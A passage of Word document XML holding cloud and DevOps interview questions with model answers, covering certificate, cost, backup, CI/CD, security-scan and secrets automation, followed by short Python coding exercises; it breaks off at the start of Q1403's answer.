        <w:t>Q1379. Certificate automation: Design a job that discovers expiring TLS certificates, alerts owners, validates renewals, and avoids duplicate notifications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scan certificates via the load balancer/Certificate Manager API and by connecting to endpoints directly (openssl s_client) as a cross-check, compute days-until-expiry, and alert owners (from a certificate-to-owner mapping) at multiple thresholds (30/14/3 days). Track already-sent alerts in a state store keyed by certificate + threshold to avoid duplicate notifications, and after a renewal, verify the new certificate is actually being served (not just issued) before marking the alert resolved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1380. Cost automation: How would you create a daily GCP cost anomaly report by project, service, label, and team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Export billing data to BigQuery via the standard billing export, run a scheduled query comparing each day's spend by project/service/label against a trailing 7 or 30-day baseline, and flag deviations beyond a statistical threshold (e.g. more than 2 standard deviations or a fixed percentage jump). Attribute cost to teams via cost-center labels enforced by policy, and deliver the report via email/Slack with the top anomalies and a link to the underlying BigQuery data for drill-down.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1381. Backup automation: Design a script that runs backups, validates checksums, tests restoration, enforces retention, and reports RPO compliance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Trigger backups on a schedule, compute and store a checksum of the backup artifact immediately after creation, and periodically (not just on-demand) perform an actual test restore into an isolated environment to verify the backup is genuinely usable, not just present. Enforce retention by deleting backups older than policy after confirming newer backups exist, and report RPO compliance by comparing the timestamp of the most recent successful (and verified) backup against the target RPO for each system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1382. CI/CD automation: How would you automatically promote one immutable artifact through development, staging, and production with approvals and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build the artifact once (container image or package) tagged with an immutable identifier (git SHA), and promote that exact artifact through environments by updating deployment manifests/references rather than rebuilding per stage. Gate production promotion behind an approval step (manual or automated based on staging metrics), keep the previous production artifact reference available for one-command rollback, and record every promotion and approval in an audit trail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1383. Security automation: Build a workflow that scans public buckets, open firewall rules, overprivileged IAM roles, and unencrypted resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run scheduled scans using Security Command Center findings plus targeted API queries: Storage buckets for public IAM bindings, firewall rules for 0.0.0.0/0 on sensitive ports, IAM policies for broad roles like Owner/Editor on service accounts, and resource configs for missing CMEK/encryption settings. Prioritize findings by exploitability and blast radius, auto-remediate only low-risk, well-understood cases (like a clearly accidental public bucket) with an audit log, and route everything else to owners with a defined SLA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1384. Incident automation: Which incident-response steps should be automated, and which must remain human-controlled?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Automate detection, alerting, initial triage data-gathering (logs, metrics, recent deploys), and low-risk mitigations with clear rollback like rolling back to the last known-good deployment or scaling out capacity. Keep human control over anything with ambiguous judgment or high blast radius - declaring a major incident, customer communication, failing over a database, or any action whose wrong call could make things worse - since automation optimizes for the common case and incidents are often the uncommon one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1385. Python testing: How would you test a cloud automation script without modifying real production resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Mock the cloud client library calls with unittest.mock or a fake client so tests exercise your logic (parsing, decision-making, error handling) without making real API calls, and use a real but isolated sandbox/dev project for integration tests that do need to hit a live API. Always default the script to dry-run mode in tests and CI, and require an explicit environment check (e.g. refusing to run destructive actions unless GCP_PROJECT matches an allowed non-prod pattern) as a safety net against accidental production runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1386. Secrets automation: How would you retrieve and rotate secrets without printing them in logs, command history, process arguments, or CI output?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Fetch secrets at runtime from Secret Manager into environment variables or in-memory, never as CLI arguments (visible in `ps` and shell history) or committed files, and mark CI variables as masked/protected so they're redacted from job logs automatically. For rotation, generate the new secret, update the secret store, roll it out to consumers, verify they've picked it up, then revoke the old version - never revoke before confirming the new one works, and log rotation events without logging the secret value itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1387. Scheduled automation: Compare cron, Kubernetes CronJobs, Cloud Scheduler with Cloud Run, and workflow orchestration for operational jobs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Plain cron on a VM is simple but has no built-in retry, alerting, or history, and is a single point of failure; Kubernetes CronJobs add retry and history within the cluster but still require you to build alerting; Cloud Scheduler triggering a Cloud Run job is serverless, has built-in retry/alerting, and scales to zero, good for simple periodic tasks; workflow orchestration (Cloud Composer/Airflow, or Cloud Workflows) is the right choice once jobs have dependencies, need conditional branching, or require visibility into multi-step pipeline state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1388. Automation reliability: How would you add dry-run mode, structured logging, metrics, checkpoints, locking, retries, and rollback to a destructive script?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add a --dry-run flag that logs every intended action without executing it, structured JSON logging with a run ID for traceability, and metrics (items processed, succeeded, failed) emitted to your monitoring system. Add checkpointing so a long-running job can resume from where it left off after a crash, a distributed lock so two instances can't run concurrently and conflict, retry logic for transient failures, and an explicit rollback path (or at minimum a recorded before-state) for any destructive action so a bad run can be undone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1389. Automation ownership: How would you package, document, release, monitor, and support internal automation used by several engineering teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Package it as a versioned CLI or library published to an internal registry with semantic versioning, write documentation covering usage, required permissions, and failure modes, and release through CI with tests gating every version. Monitor usage and failures via centralized logging/metrics so you know when it breaks before users report it, and treat it like a product with an on-call owner, a changelog, and a deprecation policy rather than a script that quietly rots once the original author moves on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Coding Exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1390. Python coding: Write a function that reads Kubernetes pod records and returns pods with restartCount above a threshold, grouped by namespace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def pods_over_threshold(pods, threshold):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    result = {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for pod in pods:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        restarts = max((c.get('restartCount', 0) for c in pod.get('containerStatuses', [])), default=0)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if restarts &gt; threshold:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            ns = pod.get('namespace', 'default')</w:t>
        <w:br/>
        <w:t xml:space="preserve">            result.setdefault(ns, []).append(pod['name'])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return result</w:t>
        <w:br/>
        <w:t>This iterates each pod's container statuses to find the max restart count, and groups pod names exceeding the threshold by namespace using setdefault to avoid KeyError on first insert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1391. Python coding: Write a log parser that counts HTTP status codes and prints the five endpoints with the highest 5xx count.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: from collections import Counter</w:t>
        <w:br/>
        <w:t>def top_5xx_endpoints(log_lines, n=5):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    counts = Counter()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for line in log_lines:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        parts = line.split()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        status, endpoint = int(parts[-2]), parts[-1]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if 500 &lt;= status &lt; 600:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            counts[endpoint] += 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for endpoint, count in counts.most_common(n):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        print(f'{endpoint}: {count}')</w:t>
        <w:br/>
        <w:t>Uses collections.Counter to tally 5xx responses per endpoint and Counter.most_common() to get the top N efficiently without manually sorting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1392. Python coding: Implement exponential backoff with jitter for an API call, with a maximum retry count and retryable-status handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import random, time</w:t>
        <w:br/>
        <w:t>def call_with_backoff(fn, max_retries=5, base=0.5, retryable={429, 500, 502, 503}):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for attempt in range(max_retries):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        response = fn()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if response.status_code not in retryable:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return response</w:t>
        <w:br/>
        <w:t xml:space="preserve">        delay = base * (2 ** attempt) + random.uniform(0, base)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        time.sleep(delay)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    raise RuntimeError('max retries exceeded')</w:t>
        <w:br/>
        <w:t>The delay grows exponentially with attempt number, and random jitter prevents many clients from retrying in lockstep and overwhelming the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1393. Python coding: Write a function that flattens nested JSON into dot-separated keys while preserving list values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def flatten(obj, prefix=''):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    items = {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if isinstance(obj, dict):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for k, v in obj.items():</w:t>
        <w:br/>
        <w:t xml:space="preserve">            items.update(flatten(v, f'{prefix}.{k}' if prefix else k))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        items[prefix] = obj</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return items</w:t>
        <w:br/>
        <w:t>Dicts recurse and build dot-separated keys; lists (and scalars) are treated as leaf values and stored as-is at the current key path rather than being expanded further.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1394. Python coding: Write a function that compares desired and actual GCP resource labels and returns missing, changed, and unexpected labels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def diff_labels(desired, actual):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    missing = {k: v for k, v in desired.items() if k not in actual}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    changed = {k: (v, actual[k]) for k, v in desired.items() if k in actual and actual[k] != v}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    unexpected = {k: v for k, v in actual.items() if k not in desired}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return {'missing': missing, 'changed': changed, 'unexpected': unexpected}</w:t>
        <w:br/>
        <w:t>Three dict comprehensions cover each category: keys desired but absent, keys present in both with different values, and keys present in actual but not declared as desired.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1395. Python coding: Implement a thread-safe rate limiter that allows a configurable number of API requests per minute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import threading, time, collections</w:t>
        <w:br/>
        <w:t>class RateLimiter:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def __init__(self, max_per_minute):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self.max_per_minute = max_per_minute</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self.calls = collections.deque()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        self.lock = threading.Lock()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    def allow(self):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        with self.lock:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            now = time.monotonic()</w:t>
        <w:br/>
        <w:t xml:space="preserve">            while self.calls and now - self.calls[0] &gt; 60:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                self.calls.popleft()</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if len(self.calls) &lt; self.max_per_minute:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                self.calls.append(now)</w:t>
        <w:br/>
        <w:t xml:space="preserve">                return True</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return False</w:t>
        <w:br/>
        <w:t>A sliding-window deque of call timestamps is protected by a lock; stale entries older than 60 seconds are dropped before checking if a new call fits under the limit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1396. Python coding: Write a script that finds duplicate IP addresses and overlapping CIDR ranges from a list of network definitions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import ipaddress</w:t>
        <w:br/>
        <w:t>def find_conflicts(cidrs):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    networks = [ipaddress.ip_network(c) for c in cidrs]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conflicts = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for i, a in enumerate(networks):</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for b in networks[i+1:]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if a.overlaps(b):</w:t>
        <w:br/>
        <w:t xml:space="preserve">                conflicts.append((str(a), str(b)))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return conflicts</w:t>
        <w:br/>
        <w:t>The ipaddress module's overlaps() method correctly handles both exact duplicates and partial containment (e.g. a /24 inside a /16) without manual bit math.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1397. Python coding: Write a function that calculates SLO compliance and remaining error budget from total and failed request counts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def slo_compliance(total, failed, slo_target=0.999):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if total == 0:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return {'compliance': 1.0, 'error_budget_remaining': 0}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    success_rate = (total - failed) / total</w:t>
        <w:br/>
        <w:t xml:space="preserve">    error_budget = (1 - slo_target) * total</w:t>
        <w:br/>
        <w:t xml:space="preserve">    remaining = error_budget - failed</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return {'compliance': success_rate, 'meets_slo': success_rate &gt;= slo_target, 'error_budget_remaining': remaining}</w:t>
        <w:br/>
        <w:t>Guards against division by zero, computes the actual success rate against the target, and expresses the error budget in absolute request counts so teams know exactly how many more failures they can tolerate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1398. Python coding: Parse Prometheus text-format metrics and return samples whose metric name and labels match given filters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import re</w:t>
        <w:br/>
        <w:t>def parse_metrics(text, name_filter, label_filters=None):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    label_filters = label_filters or {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    matches = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for line in text.splitlines():</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if line.startswith('#') or not line.strip():</w:t>
        <w:br/>
        <w:t xml:space="preserve">            continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">        m = re.match(r'(\w+)(\{(.*)\})?\s+([\d.eE+-]+)', line)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if not m or m.group(1) != name_filter:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">        labels = dict(re.findall(r'(\w+)="([^"]*)"', m.group(3) or ''))</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if all(labels.get(k) == v for k, v in label_filters.items()):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            matches.append((labels, float(m.group(4))))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return matches</w:t>
        <w:br/>
        <w:t>A regex splits each line into metric name, optional label block, and value, then a second regex extracts individual key="value" label pairs for filtering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1399. Python coding: Write a function that selects the latest valid semantic version from a list of container image tags.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import re</w:t>
        <w:br/>
        <w:t>def latest_semver(tags):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    versions = []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    for tag in tags:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        m = re.fullmatch(r'v?(\d+)\.(\d+)\.(\d+)', tag)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if m:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            versions.append((tuple(int(x) for x in m.groups()), tag))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return max(versions, key=lambda v: v[0])[1] if versions else None</w:t>
        <w:br/>
        <w:t>Only tags matching strict semver are considered valid; comparing the (major, minor, patch) tuple with max() gives correct numeric ordering, avoiding the classic string-sort bug where '1.10.0' sorts before '1.9.0'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1400. Python coding: Implement a context manager that records operation duration and emits structured success or failure logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import time, logging, contextlib</w:t>
        <w:br/>
        <w:t>@contextlib.contextmanager</w:t>
        <w:br/>
        <w:t>def timed_operation(name):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    start = time.perf_counter()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        yield</w:t>
        <w:br/>
        <w:t xml:space="preserve">        logging.info('operation complete', extra={'op': name, 'duration_s': time.perf_counter() - start, 'status': 'success'})</w:t>
        <w:br/>
        <w:t xml:space="preserve">    except Exception:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        logging.error('operation failed', extra={'op': name, 'duration_s': time.perf_counter() - start, 'status': 'error'})</w:t>
        <w:br/>
        <w:t xml:space="preserve">        raise</w:t>
        <w:br/>
        <w:t>The try/except inside the generator ensures duration and outcome are always logged, and re-raising preserves the original exception and traceback for the caller.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1401. Python coding: Write unit tests for a function that deletes old cloud snapshots, including dry-run, API failure, and retention exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: def test_dry_run_does_not_call_delete(mock_client):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    delete_old_snapshots(mock_client, retention_days=30, dry_run=True)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    mock_client.delete.assert_not_called()</w:t>
        <w:br/>
        <w:br/>
        <w:t>def test_api_failure_is_caught_and_logged(mock_client, caplog):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    mock_client.delete.side_effect = Exception('quota exceeded')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    delete_old_snapshots(mock_client, retention_days=30, dry_run=False)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    assert 'quota exceeded' in caplog.text</w:t>
        <w:br/>
        <w:br/>
        <w:t>def test_snapshot_within_retention_exception_is_skipped(mock_client):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    delete_old_snapshots(mock_client, retention_days=30, dry_run=False, exceptions=['critical-snap'])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    assert 'critical-snap' not in [c.args[0] for c in mock_client.delete.call_args_list]</w:t>
        <w:br/>
        <w:t>Each test isolates one behavior - dry-run makes no real calls, an API failure is caught rather than crashing the whole run, and explicitly excepted snapshots are never deleted regardless of age.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1402. Python coding: Write a script that reads a CSV of users and roles, validates allowed roles, and produces an IAM change plan without applying it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: import csv</w:t>
        <w:br/>
        <w:t>ALLOWED_ROLES = {'roles/viewer', 'roles/editor', 'roles/iam.securityReviewer'}</w:t>
        <w:br/>
        <w:t>def build_iam_plan(csv_path):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    plan, errors = [], []</w:t>
        <w:br/>
        <w:t xml:space="preserve">    with open(csv_path) as f:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        for row in csv.DictReader(f):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if row['role'] not in ALLOWED_ROLES:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                errors.append(f"{row['user']}: role {row['role']} not allowed")</w:t>
        <w:br/>
        <w:t xml:space="preserve">                continue</w:t>
        <w:br/>
        <w:t xml:space="preserve">            plan.append({'user': row['user'], 'role': row['role'], 'action': 'grant'})</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return {'plan': plan, 'errors': errors}</w:t>
        <w:br/>
        <w:t>The function only builds and returns a change plan plus validation errors - actually applying the IAM bindings would be a separate, explicitly invoked step, keeping validation and mutation cleanly separated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1403. Python coding: Implement a bounded worker pool that processes cloud resources concurrently while preserving errors for a final report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
